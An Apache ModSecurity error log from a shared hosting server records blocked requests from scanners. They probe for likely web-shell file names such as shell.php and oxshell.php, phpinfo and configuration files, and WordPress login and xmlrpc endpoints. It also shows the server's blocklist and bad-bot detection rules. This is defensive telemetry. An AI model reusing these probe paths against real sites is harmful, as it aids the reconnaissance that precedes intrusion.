[Tue May 26 13:05:03.142186 2026] [security2:error] [pid 485064:tid 485108] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ff1.php"] [unique_id "ahVNJz9tlF55stOmSqEF9wAArCs"]
[Tue May 26 13:05:03.228527 2026] [security2:error] [pid 485064:tid 485224] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNJj9tlF55stOmSqEF6QAAAKM"]
[Tue May 26 13:05:03.314264 2026] [security2:error] [pid 485064:tid 485118] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/flower.php"] [unique_id "ahVNJz9tlF55stOmSqEGAgAAqDU"]
[Tue May 26 13:05:03.544739 2026] [security2:error] [pid 485064:tid 485189] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/file.php"] [unique_id "ahVNJz9tlF55stOmSqEGFgAAmXw"]
[Tue May 26 13:05:03.755165 2026] [security2:error] [pid 485064:tid 485101] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/goods.php"] [unique_id "ahVNJz9tlF55stOmSqEGGgAA9iQ"]
[Tue May 26 13:05:03.927521 2026] [security2:error] [pid 485064:tid 485114] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/g.php"] [unique_id "ahVNJz9tlF55stOmSqEGHgAA-zE"]
[Tue May 26 13:05:04.100037 2026] [security2:error] [pid 485064:tid 485115] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/hplfuns.php"] [unique_id "ahVNKD9tlF55stOmSqEGKAAAuTI"]
[Tue May 26 13:05:04.273059 2026] [security2:error] [pid 485064:tid 485111] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ioxi-o.php"] [unique_id "ahVNKD9tlF55stOmSqEGMgAAmi4"]
[Tue May 26 13:05:04.444994 2026] [security2:error] [pid 485064:tid 485093] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/in.php"] [unique_id "ahVNKD9tlF55stOmSqEGPQAAnBw"]
[Tue May 26 13:05:04.616363 2026] [security2:error] [pid 485064:tid 485113] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/info.php"] [unique_id "ahVNKD9tlF55stOmSqEGQwAAzjA"]
[Tue May 26 13:05:04.787607 2026] [security2:error] [pid 485064:tid 485075] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/inputs.php"] [unique_id "ahVNKD9tlF55stOmSqEGUQAAmwo"]
[Tue May 26 13:05:04.959228 2026] [security2:error] [pid 485064:tid 485105] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/item.php"] [unique_id "ahVNKD9tlF55stOmSqEGVwAAhSg"]
[Tue May 26 13:05:05.140137 2026] [security2:error] [pid 485064:tid 485239] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNKD9tlF55stOmSqEGUAAAALI"]
[Tue May 26 13:05:05.159697 2026] [security2:error] [pid 485064:tid 485184] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/k.php"] [unique_id "ahVNKT9tlF55stOmSqEGYQAA6Xc"]
[Tue May 26 13:05:05.362393 2026] [security2:error] [pid 485064:tid 485159] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/license.php"] [unique_id "ahVNKT9tlF55stOmSqEGbgAAml4"]
[Tue May 26 13:05:05.537014 2026] [security2:error] [pid 485064:tid 485140] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/load.php"] [unique_id "ahVNKT9tlF55stOmSqEGdAAA8Es"]
[Tue May 26 13:05:05.709126 2026] [security2:error] [pid 485064:tid 485144] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/manager.php"] [unique_id "ahVNKT9tlF55stOmSqEGeQAA7E8"]
[Tue May 26 13:05:05.880773 2026] [security2:error] [pid 485064:tid 485161] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/media.php"] [unique_id "ahVNKT9tlF55stOmSqEGggAArWA"]
[Tue May 26 13:05:06.052252 2026] [security2:error] [pid 485064:tid 485157] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/mar.php"] [unique_id "ahVNKj9tlF55stOmSqEGjgAAtlw"]
[Tue May 26 13:05:06.103506 2026] [security2:error] [pid 485064:tid 485313] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNKj9tlF55stOmSqEGiwAAAPw"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1261213&moderation-hash=c3216d971620d5dae8b0519854a3d0bc
[Tue May 26 13:05:06.224136 2026] [security2:error] [pid 485064:tid 485136] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/my1.php"] [unique_id "ahVNKj9tlF55stOmSqEGkwAAqkc"]
[Tue May 26 13:05:06.422121 2026] [security2:error] [pid 485064:tid 485150] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/mm.php"] [unique_id "ahVNKj9tlF55stOmSqEGmgAA2FU"]
[Tue May 26 13:05:06.634015 2026] [security2:error] [pid 485064:tid 485138] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/network.php"] [unique_id "ahVNKj9tlF55stOmSqEGpAAAmkk"]
[Tue May 26 13:05:06.805396 2026] [security2:error] [pid 485064:tid 485137] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/new.php"] [unique_id "ahVNKj9tlF55stOmSqEGrgAAvEg"]
[Tue May 26 13:05:06.978559 2026] [security2:error] [pid 485064:tid 485147] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/0x.php"] [unique_id "ahVNKj9tlF55stOmSqEGtQAA8VI"]
[Tue May 26 13:05:07.150352 2026] [security2:error] [pid 485064:tid 485186] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/0.php"] [unique_id "ahVNKz9tlF55stOmSqEGvAAAzXk"]
[Tue May 26 13:05:07.192930 2026] [security2:error] [pid 485064:tid 485272] [client 49.13.164.148:6802] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVNKz9tlF55stOmSqEGvQAAANM"], referer: http://ucdc.co.in/
[Tue May 26 13:05:07.322734 2026] [security2:error] [pid 485064:tid 485188] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/oxshell.php"] [unique_id "ahVNKz9tlF55stOmSqEGwwAAwns"]
[Tue May 26 13:05:07.484953 2026] [security2:error] [pid 485064:tid 485316] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNKz9tlF55stOmSqEGuAAAAP8"]
[Tue May 26 13:05:07.522836 2026] [security2:error] [pid 485064:tid 485149] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/php8.php"] [unique_id "ahVNKz9tlF55stOmSqEGywAA-VQ"]
[Tue May 26 13:05:07.723518 2026] [security2:error] [pid 485064:tid 485165] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/p.php"] [unique_id "ahVNKz9tlF55stOmSqEG0gAAnWQ"]
[Tue May 26 13:05:07.897296 2026] [security2:error] [pid 485064:tid 485145] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/php.php"] [unique_id "ahVNKz9tlF55stOmSqEG2QAAiVA"]
[Tue May 26 13:05:07.957962 2026] [security2:error] [pid 485064:tid 485245] [client 157.20.138.61:49409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNKz9tlF55stOmSqEG4AAAALg"]
[Tue May 26 13:05:07.958102 2026] [security2:error] [pid 485064:tid 485245] [client 157.20.138.61:49409] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNKz9tlF55stOmSqEG4AAAALg"]
[Tue May 26 13:05:08.069477 2026] [security2:error] [pid 485064:tid 485163] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/past.php"] [unique_id "ahVNLD9tlF55stOmSqEG5AAAn2I"]
[Tue May 26 13:05:08.241267 2026] [security2:error] [pid 485064:tid 485180] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/root.php"] [unique_id "ahVNLD9tlF55stOmSqEG6QAAl3M"]
[Tue May 26 13:05:08.412457 2026] [security2:error] [pid 485064:tid 485134] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/r.php"] [unique_id "ahVNLD9tlF55stOmSqEG8AAA50U"]
[Tue May 26 13:05:08.554006 2026] [security2:error] [pid 485064:tid 485065] [remote 168.144.30.105:34204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 105.30.144.168.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVNLD9tlF55stOmSqEG6AAA4QA"]
[Tue May 26 13:05:08.615637 2026] [security2:error] [pid 485064:tid 485155] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/sid3.php"] [unique_id "ahVNLD9tlF55stOmSqEG9wAA-Fo"]
[Tue May 26 13:05:08.788265 2026] [security2:error] [pid 485064:tid 485170] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ss.php"] [unique_id "ahVNLD9tlF55stOmSqEG-wAAm2k"]
[Tue May 26 13:05:08.959429 2026] [security2:error] [pid 485064:tid 485077] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/sts.php"] [unique_id "ahVNLD9tlF55stOmSqEHCwABAAw"]
[Tue May 26 13:05:09.136980 2026] [security2:error] [pid 485064:tid 485171] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/shell.php"] [unique_id "ahVNLT9tlF55stOmSqEHDwAA9Wo"]
[Tue May 26 13:05:09.308760 2026] [security2:error] [pid 485064:tid 485175] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/setup-config.php"] [unique_id "ahVNLT9tlF55stOmSqEHFQAA_W4"]
[Tue May 26 13:05:09.480404 2026] [security2:error] [pid 485064:tid 485187] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/t.php"] [unique_id "ahVNLT9tlF55stOmSqEHHQAAoHo"]
[Tue May 26 13:05:09.651833 2026] [security2:error] [pid 485064:tid 485181] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/up.php"] [unique_id "ahVNLT9tlF55stOmSqEHIQAA43Q"]
[Tue May 26 13:05:09.821074 2026] [security2:error] [pid 485064:tid 485239] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNLT9tlF55stOmSqEHGQAAALI"]
[Tue May 26 13:05:09.856100 2026] [security2:error] [pid 485064:tid 485151] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/ultra.php"] [unique_id "ahVNLT9tlF55stOmSqEHKAAA5VY"]
[Tue May 26 13:05:09.990922 2026] [security2:error] [pid 485064:tid 485177] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/server_info.php"] [unique_id "ahVNLT9tlF55stOmSqEHMgAAtHA"], referer: http://kingsclub.in/server_info.php
[Tue May 26 13:05:09.997151 2026] [security2:error] [pid 485064:tid 485074] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/portal/phpinfo.php"] [unique_id "ahVNLT9tlF55stOmSqEHMwAAlQk"], referer: http://kingsclub.in/portal/phpinfo.php
[Tue May 26 13:05:10.027435 2026] [security2:error] [pid 485064:tid 485080] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/vv.php"] [unique_id "ahVNLj9tlF55stOmSqEHNwAA-A8"]
[Tue May 26 13:05:10.062097 2026] [security2:error] [pid 485064:tid 485167] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/configuration.php"] [unique_id "ahVNLj9tlF55stOmSqEHOQAA4mY"], referer: http://kingsclub.in/configuration.php
[Tue May 26 13:05:10.068887 2026] [security2:error] [pid 485064:tid 485092] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/pinfo.php"] [unique_id "ahVNLj9tlF55stOmSqEHOwAA5Bs"], referer: http://kingsclub.in/pinfo.php
[Tue May 26 13:05:10.089303 2026] [security2:error] [pid 485064:tid 485174] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/php_info.php"] [unique_id "ahVNLj9tlF55stOmSqEHPAABA20"], referer: http://kingsclub.in/php_info.php
[Tue May 26 13:05:10.133727 2026] [security2:error] [pid 485064:tid 485079] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/functions.php"] [unique_id "ahVNLj9tlF55stOmSqEHQQAAsA4"], referer: http://kingsclub.in/functions.php
[Tue May 26 13:05:10.187349 2026] [security2:error] [pid 485064:tid 485084] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNLj9tlF55stOmSqEHRAAAyRM"], referer: http://kingsclub.in/index.php
[Tue May 26 13:05:10.196323 2026] [security2:error] [pid 485064:tid 485090] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/test.php"] [unique_id "ahVNLj9tlF55stOmSqEHRQAAoRk"], referer: http://kingsclub.in/test.php
[Tue May 26 13:05:10.201159 2026] [security2:error] [pid 485064:tid 485173] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/V5.php"] [unique_id "ahVNLj9tlF55stOmSqEHRgAAz2w"]
[Tue May 26 13:05:10.268440 2026] [security2:error] [pid 485064:tid 485133] [remote 91.92.42.86:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.42.92.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/phpinfo/info.php"] [unique_id "ahVNLj9tlF55stOmSqEHSgAAqUQ"], referer: http://kingsclub.in/phpinfo/info.php
[Tue May 26 13:05:10.373207 2026] [security2:error] [pid 485064:tid 485100] [remote 23.100.97.57:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.digitalgerminate.com"] [uri "/wp-user.php"] [unique_id "ahVNLj9tlF55stOmSqEHTgAAxiM"]
